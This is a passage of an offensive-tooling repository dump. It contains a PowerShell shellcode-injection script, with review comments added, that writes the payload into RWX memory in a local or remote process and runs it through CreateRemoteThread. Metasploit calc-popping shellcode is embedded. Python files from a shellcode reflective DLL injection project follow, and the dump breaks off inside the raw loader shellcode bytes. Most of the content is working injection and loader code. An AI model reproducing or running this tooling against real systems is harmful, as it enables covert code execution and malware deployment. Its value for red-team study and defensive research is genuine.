        $Address.ToString("X$($IntSizePtr*2)") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } }
        [System.Array]::Reverse($LittleEndianByteArray)

        Write-Output $LittleEndianByteArray
    }

    # NOTE(review): this empty array is replaced by the typed assignment in both branches below.
    $CallStub = New-Object Byte[](0)

    if ($IntSizePtr -eq 8)
    {
        [Byte[]] $CallStub = 0x48,0xB8 # MOV QWORD RAX, &shellcode
        $CallStub += ConvertTo-LittleEndian $BaseAddr # &shellcode
        $CallStub += 0xFF,0xD0 # CALL RAX
        $CallStub += 0x6A,0x00 # PUSH BYTE 0
        $CallStub += 0x48,0xB8 # MOV QWORD RAX, &ExitThread
        $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread
        $CallStub += 0xFF,0xD0 # CALL RAX
    }
    else
    {
        [Byte[]] $CallStub = 0xB8 # MOV DWORD EAX, &shellcode
        $CallStub += ConvertTo-LittleEndian $BaseAddr # &shellcode
        $CallStub += 0xFF,0xD0 # CALL EAX
        $CallStub += 0x6A,0x00 # PUSH BYTE 0
        $CallStub += 0xB8 # MOV DWORD EAX, &ExitThread
        $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread
        $CallStub += 0xFF,0xD0 # CALL EAX
    }

    Write-Output $CallStub
}
183 |
# Writes the architecture-appropriate payload ($Shellcode32 / $Shellcode64 from the enclosing scope) into
# process $ProcessID and starts it on a new thread via a call stub built by Emit-CallThreadStub.
# Requires the delegates $OpenProcess, $VirtualAllocEx, $WriteProcessMemory, $CreateRemoteThread, $CloseHandle
# (and $IsWow64Process on a 64-bit OS) plus $64bitOS / $PowerShell32bit to have been set up by the caller.
# Returns nothing; throws on the first failed API call.
function Local:Inject-RemoteShellcode ([Int] $ProcessID)
{
    # Open a handle to the process you want to inject into
    # NOTE(review): 0x001F0FFF is PROCESS_ALL_ACCESS, broader than the operations performed below need.
    $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)

    if (!$hProcess)
    {
        Throw "Unable to open a process handle for PID: $ProcessID"
    }
    # NOTE(review): every Throw from this point on leaks $hProcess - there is no try/finally around the handle.

    $IsWow64 = $false

    if ($64bitOS) # Only perform these checks if CPU is 64-bit
    {
        # Determine if the process specified is 32 or 64 bit
        # The BOOL result is discarded, so a failed query leaves $IsWow64 at $false and the process is treated as 64-bit.
        $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null

        if ((!$IsWow64) -and $PowerShell32bit)
        {
            Throw 'Shellcode injection targeting a 64-bit process from 32-bit PowerShell is not supported. Use the 64-bit version of Powershell if you want this to work.'
        }
        elseif ($IsWow64) # 32-bit Wow64 process
        {
            if ($Shellcode32.Length -eq 0)
            {
                Throw 'No shellcode was placed in the $Shellcode32 variable!'
            }

            $Shellcode = $Shellcode32
            Write-Verbose 'Injecting into a Wow64 process.'
            Write-Verbose 'Using 32-bit shellcode.'
        }
        else # 64-bit process
        {
            if ($Shellcode64.Length -eq 0)
            {
                Throw 'No shellcode was placed in the $Shellcode64 variable!'
            }

            $Shellcode = $Shellcode64
            Write-Verbose 'Using 64-bit shellcode.'
        }
    }
    else # 32-bit CPU
    {
        if ($Shellcode32.Length -eq 0)
        {
            Throw 'No shellcode was placed in the $Shellcode32 variable!'
        }

        $Shellcode = $Shellcode32
        Write-Verbose 'Using 32-bit shellcode.'
    }

    # Reserve and commit enough memory in remote process to hold the shellcode (one byte more than the payload).
    # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE - a single RWX region, as the author's comment says.
    $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)

    if (!$RemoteMemAddr)
    {
        Throw "Unable to allocate shellcode memory in PID: $ProcessID"
    }

    Write-Verbose "Shellcode memory reserved at 0x$($RemoteMemAddr.ToString("X$([IntPtr]::Size*2)"))"

    # Copy shellcode into the previously allocated memory
    # NOTE(review): the BOOL result and the bytes-written count are both discarded; a short or failed write goes unnoticed.
    $WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.Length, [Ref] 0) | Out-Null

    # Get address of ExitThread function
    # NOTE(review): resolved in *this* process; it is only meaningful in the target if kernel32.dll is mapped at the same base there - confirm.
    $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread

    if ($IsWow64)
    {
        # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread.
        $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32

        Write-Verbose 'Emitting 32-bit assembly call stub.'
    }
    else
    {
        # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread.
        $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64

        Write-Verbose 'Emitting 64-bit assembly call stub.'
    }

    # Allocate inline assembly stub (second RWX region, same flags as above)
    $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX)

    if (!$RemoteStubAddr)
    {
        Throw "Unable to allocate thread call stub memory in PID: $ProcessID"
    }

    Write-Verbose "Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString("X$([IntPtr]::Size*2)"))"

    # Write the call stub (32- or 64-bit, chosen above) to remote process memory space; result again discarded.
    $WriteProcessMemory.Invoke($hProcess, $RemoteStubAddr, $CallStub, $CallStub.Length, [Ref] 0) | Out-Null

    # Execute shellcode as a remote thread: entry = the stub, parameter = the payload address.
    $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)

    if (!$ThreadHandle)
    {
        Throw "Unable to launch remote thread in PID: $ProcessID"
    }
    # NOTE(review): $ThreadHandle is never closed.

    # Close process handle (return value ignored)
    $CloseHandle.Invoke($hProcess) | Out-Null

    Write-Verbose 'Shellcode injection complete!'
}
295 |
# Runs the payload matching the current PowerShell bitness ($Shellcode32 / $Shellcode64 from the enclosing scope)
# on a new thread inside this process, waits for that thread to finish, then frees the two buffers.
# Requires the delegates $VirtualAlloc, $VirtualFree, $CreateThread and $WaitForSingleObject and the
# $PowerShell32bit flag to have been set up by the caller. Returns nothing; throws on a failed API call.
function Local:Inject-LocalShellcode
{
    if ($PowerShell32bit) {
        if ($Shellcode32.Length -eq 0)
        {
            Throw 'No shellcode was placed in the $Shellcode32 variable!'
            # NOTE(review): unreachable - Throw has already left the function.
            return
        }

        $Shellcode = $Shellcode32
        Write-Verbose 'Using 32-bit shellcode.'
    }
    else
    {
        if ($Shellcode64.Length -eq 0)
        {
            Throw 'No shellcode was placed in the $Shellcode64 variable!'
            # NOTE(review): unreachable - Throw has already left the function.
            return
        }

        $Shellcode = $Shellcode64
        Write-Verbose 'Using 64-bit shellcode.'
    }

    # Allocate RWX memory for the shellcode (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE)
    $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
    if (!$BaseAddress)
    {
        # NOTE(review): $ProcessID is the remote-injection parameter and is not bound on this local path, so the message is misleading.
        Throw "Unable to allocate shellcode memory in PID: $ProcessID"
    }

    Write-Verbose "Shellcode memory reserved at 0x$($BaseAddress.ToString("X$([IntPtr]::Size*2)"))"

    # Copy shellcode to RWX buffer
    [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length)

    # Get address of ExitThread function
    $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread

    if ($PowerShell32bit)
    {
        $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32

        Write-Verbose 'Emitting 32-bit assembly call stub.'
    }
    else
    {
        $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64

        Write-Verbose 'Emitting 64-bit assembly call stub.'
    }

    # Allocate RWX memory for the thread call stub
    $CallStubAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)
    if (!$CallStubAddress)
    {
        Throw "Unable to allocate thread call stub."
    }

    Write-Verbose "Thread call stub memory reserved at 0x$($CallStubAddress.ToString("X$([IntPtr]::Size*2)"))"

    # Copy call stub to RWX buffer
    [System.Runtime.InteropServices.Marshal]::Copy($CallStub, 0, $CallStubAddress, $CallStub.Length)

    # Launch shellcode in its own thread: entry = the stub, parameter = the payload address.
    $ThreadHandle = $CreateThread.Invoke([IntPtr]::Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntPtr]::Zero)
    if (!$ThreadHandle)
    {
        Throw "Unable to launch thread."
    }

    # Wait for shellcode thread to terminate (0xFFFFFFFF is INFINITE; PowerShell parses the literal as Int32 -1)
    $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null
    # NOTE(review): $ThreadHandle is never closed.

    # NOTE(review): with MEM_RELEASE (0x8000) VirtualFree requires a size of 0; a nonzero size makes the call fail,
    # and because the BOOL result is discarded the two regions are most likely never released - confirm with GetLastError.
    $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)
    $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)

    Write-Verbose 'Shellcode injection complete!'
}
375 |
376 | # A valid pointer to IsWow64Process will be returned if CPU is 64-bit
377 | $IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process
378 |
379 | $AddressWidth = $null
380 |
381 | try {
382 | $AddressWidth = @(Get-WmiObject -Query 'SELECT AddressWidth FROM Win32_Processor')[0] | Select-Object -ExpandProperty AddressWidth
383 | } catch {
384 | throw 'Unable to determine OS processor address width.'
385 | }
386 |
387 | switch ($AddressWidth) {
388 | '32' {
389 | $64bitOS = $False
390 | }
391 |
392 | '64' {
393 | $64bitOS = $True
394 |
395 | $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
396 | $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
397 | }
398 |
399 | default {
400 | throw 'Invalid OS address width detected.'
401 | }
402 | }
403 |
404 | if ([IntPtr]::Size -eq 4)
405 | {
406 | $PowerShell32bit = $true
407 | }
408 | else
409 | {
410 | $PowerShell32bit = $false
411 | }
412 |
413 | if ($PSBoundParameters['Shellcode'])
414 | {
415 | # Users passing in shellcode through the '-Shellcode' parameter are responsible for ensuring it targets
416 | # the correct architechture - x86 vs. x64. This script has no way to validate what you provide it.
417 | [Byte[]] $Shellcode32 = $Shellcode
418 | [Byte[]] $Shellcode64 = $Shellcode32
419 | }
420 | else
421 | {
422 | # Pop a calc... or whatever shellcode you decide to place in here
423 | # I sincerely hope you trust that this shellcode actually pops a calc...
424 | # Insert your shellcode here in the for 0xXX,0xXX,...
425 | # 32-bit payload
426 | # msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread
427 | [Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,
428 | 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,
429 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,
430 | 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,
431 | 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,
432 | 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,
433 | 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
434 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,
435 | 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,
436 | 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,
437 | 0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,
438 | 0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,
439 | 0x61,0x6c,0x63,0x00)
440 |
441 | # 64-bit payload
442 | # msfpayload windows/x64/exec CMD="calc" EXITFUNC=thread
443 | [Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,
444 | 0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,
445 | 0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,
446 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,
447 | 0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,
448 | 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,
449 | 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,
450 | 0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,
451 | 0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,
452 | 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,
453 | 0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,
454 | 0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
455 | 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,
456 | 0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,
457 | 0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
458 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
459 | 0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)
460 | }
461 |
462 | if ( $PSBoundParameters['ProcessID'] )
463 | {
464 | # Inject shellcode into the specified process ID
465 | $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
466 | $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
467 | $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
468 | $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
469 | $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr])
470 | $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
471 | $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
472 | $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])
473 | $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
474 | $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
475 | $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
476 | $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
477 | $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle
478 | $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])
479 | $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)
480 |
481 | Write-Verbose "Injecting shellcode into PID: $ProcessId"
482 |
483 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',
484 | "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
485 | {
486 | Inject-RemoteShellcode $ProcessId
487 | }
488 | }
489 | else
490 | {
491 | # Inject shellcode into the currently running PowerShell process
492 | $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
493 | $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])
494 | $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
495 | $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
496 | $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool])
497 | $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
498 | $CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread
499 | $CreateThreadDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
500 | $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
501 | $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
502 | $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int])
503 | $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
504 |
505 | Write-Verbose "Injecting shellcode into PowerShell"
506 |
507 | if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',
508 | "Injecting shellcode into the running PowerShell process!" ) )
509 | {
510 | Inject-LocalShellcode
511 | }
512 | }
513 | }
514 |
--------------------------------------------------------------------------------
/Python/ConvertToShellcode.py:
--------------------------------------------------------------------------------
import argparse
import os

from ShellcodeRDI import *
3 |
__version__ = '1.2'  # reported by -v/--version
5 |
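def main():
    """Command-line entry point: convert a DLL into position-independent shellcode.

    Parses the options below, reads the input DLL, folds the selected switches
    into the loader ``flags`` bitmask and passes everything to
    ``ConvertToShellcode`` (imported from ShellcodeRDI).  The result is written
    next to the input file: ``<name>.bin`` for ``raw`` output, or ``<name>.txt``
    holding a ``\\xNN``-escaped string for ``string`` output.

    Returns:
        None.  argparse exits on invalid arguments; OSError propagates if the
        input cannot be read or the output cannot be written.
    """
    parser = argparse.ArgumentParser(description='RDI Shellcode Converter', conflict_handler='resolve')
    parser.add_argument('-v', '--version', action='version', version='%(prog)s Version: ' + __version__)
    parser.add_argument('input_dll', help='DLL to convert to shellcode')
    parser.add_argument('-f', '--function-name', dest='function_name', help='The function to call after DllMain', default='SayHello')
    parser.add_argument('-u', '--user-data', dest='user_data', help='Data to pass to the target function', default='dave')
    parser.add_argument('-c', '--clear-header', dest='clear_header', action='store_true', help='Clear the PE header on load')
    parser.add_argument('-b', '--pass-shellcode-base', dest='pass_shellcode_base', action='store_true', help='Pass shellcode base address to exported function')
    parser.add_argument('-i', '--obfuscate-imports', dest='obfuscate_imports', action='store_true', help='Randomize import dependency load order', default=False)
    parser.add_argument('-d', '--import-delay', dest='import_delay', help='Number of seconds to pause between loading imports', type=int, default=0)
    # choices= makes an unknown format an argparse error; previously it silently produced no output file.
    parser.add_argument('-of', '--output-format', dest='output_format', help='Output format of the shellcode (e.g. raw,string)', type=str, choices=('raw', 'string'), default="raw")

    arguments = parser.parse_args()

    # The delay is packed into 16 bits of the flags word (see _build_flags); reject values that would spill over.
    if not 0 <= arguments.import_delay <= 0xFFFF:
        parser.error('--import-delay must be between 0 and 65535 seconds')

    input_dll = arguments.input_dll

    # The context manager closes the file even if ConvertToShellcode raises later.
    with open(input_dll, 'rb') as dll_file:
        dll = dll_file.read()

    flags = _build_flags(arguments)

    converted_dll = ConvertToShellcode(dll, HashFunctionName(arguments.function_name), arguments.user_data.encode(), flags)

    if arguments.output_format == "raw":
        output_bin = _output_path(input_dll, '.bin')
        print('Creating Shellcode: {}'.format(output_bin))
        with open(output_bin, 'wb') as f:
            f.write(converted_dll)

    elif arguments.output_format == "string":
        output_bin = _output_path(input_dll, '.txt')
        converted_dll_text = "".join(r"\x{:02x}".format(c) for c in converted_dll)

        print('Creating Shellcode: {}'.format(output_bin))
        with open(output_bin, 'w') as f:
            f.write(converted_dll_text)


def _build_flags(arguments):
    """Fold the parsed CLI switches into the loader flags bitmask.

    The bit values are the ones this script has always passed to
    ``ConvertToShellcode``: 0x1 clear the PE header, 0x4 randomize the import
    load order (with the delay in seconds carried in bits 16-31), 0x8 pass the
    shellcode base address to the exported function.

    Args:
        arguments: the ``argparse.Namespace`` produced in ``main``.

    Returns:
        int bitmask.
    """
    flags = 0

    if arguments.clear_header:
        flags |= 0x1

    if arguments.obfuscate_imports:
        # The delay is only encoded when import obfuscation is on; ``<<`` binds tighter than ``|``.
        flags = flags | 0x4 | arguments.import_delay << 16

    if arguments.pass_shellcode_base:
        flags |= 0x8

    return flags


def _output_path(input_dll, suffix):
    """Return *input_dll* with its final extension replaced by *suffix*.

    Uses ``os.path.splitext`` so only the last extension changes.  The former
    ``str.replace('.dll', ...)`` rewrote every ``.dll`` occurrence in the path
    and, when the name lacked a lowercase ``.dll``, returned the input path
    unchanged - so ``raw`` output would have overwritten the input DLL.

    Args:
        input_dll: path given on the command line.
        suffix: new extension including the leading dot, e.g. ``'.bin'``.

    Returns:
        str output path.
    """
    stem, _ = os.path.splitext(input_dll)
    return stem + suffix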
50 |
# Only run the converter when executed as a script, not when imported.
if __name__ == '__main__':
    main()
53 |
--------------------------------------------------------------------------------
/Python/Python.pyproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Debug
5 | 2.0
6 | be642266-f34d-43c3-b6e4-eebf8e489519
7 |
8 |
9 |
10 |
11 |
12 |
13 | .
14 | .
15 | Python
16 | RDIShellcodePyLoader
17 |
18 |
19 | true
20 | false
21 |
22 |
23 | true
24 | false
25 |
26 |
27 | 10.0
28 |
29 |
30 |
31 |
32 |
33 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
--------------------------------------------------------------------------------
/Python/ShellcodeRDI.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
# Refuse to run on Python 2: the hashing below iterates bytes as ints and
# uses str.encode() semantics that only hold on Python 3.
if sys.version_info < (3,0):
    print("[!] Sorry, requires Python 3.x")
    sys.exit(1)
6 |
7 | import struct
8 | from struct import pack
9 |
# IMAGE_FILE_MACHINE_* values of the COFF header's Machine field.
MACHINE_IA64=512     # 0x0200, Itanium
MACHINE_AMD64=34404  # 0x8664, x64
12 |
13 | def is64BitDLL(bytes):
14 | header_offset = struct.unpack("> r_bits%max_bits) | \
22 | (val << (max_bits-(r_bits%max_bits)) & (2**max_bits-1))
23 |
def HashFunctionName(name, module = None):
    """Compute the 32-bit ROR-13 hash the loader uses to look up an export.

    *name* is hashed as a NUL-terminated byte string.  When *module* is given
    it is upper-cased, encoded as UTF-16LE with a two-byte terminator, hashed
    the same way and added to the function hash, folding a single carry out of
    bit 32.  Both loops use ror() defined earlier in this module.

    Args:
        name: export name (str).
        module: optional module name (str); a falsy value means "no module".

    Returns:
        int hash value.
    """
    terminated_name = name.encode() + b'\x00'

    def _ror13_sum(data):
        # Rotate the running value right by 13 bits (32-bit width), then add the byte.
        acc = 0
        for octet in data:
            acc = ror(acc, 13, 32)
            acc += octet
        return acc

    if not module:
        return _ror13_sum(terminated_name)

    module_bytes = module.upper().encode('UTF-16LE') + b'\x00\x00'
    combined = _ror13_sum(terminated_name) + _ror13_sum(module_bytes)

    # One-shot wrap to 32 bits, exactly as the module-aware path has always done.
    if combined > 0xFFFFFFFF:
        combined -= 0x100000000

    return combined
55 |
56 | def ConvertToShellcode(dllBytes, functionHash=0x10, userData=b'None', flags=0):
57 |
58 | #MARKER:S
59 | rdiShellcode32 = b'\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89\xAC\x24\xB4\x00\x00\x00\x89\x6C\x24\x38\x89\xAC\x24\xBC\x00\x00\x00\x89\xAC\x24\xC4\x00\x00\x00\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xB0\x00\x00\x00\x89\xAC\x24\xE0\x00\x00\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73
